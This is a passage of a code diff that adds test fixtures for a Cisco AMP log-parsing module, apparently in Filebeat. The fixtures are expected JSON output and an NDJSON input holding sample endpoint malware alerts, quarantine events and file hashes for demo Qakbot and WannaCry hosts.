"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870786", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "", + "file.path": "", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 84487, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 85686, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88168, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239046651838535", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239050946806000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90868, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814971", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 91988, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93180, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 773000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 94365, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782277", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 95638, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 570000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 96911, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782275", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 414000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 98184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782274", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 368000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 99457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782273", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 134000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 100730, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782272", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 102003, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782271", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103275, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782270", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104547, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log new file mode 100644 index 00000000000..6ccff00d38b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log @@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 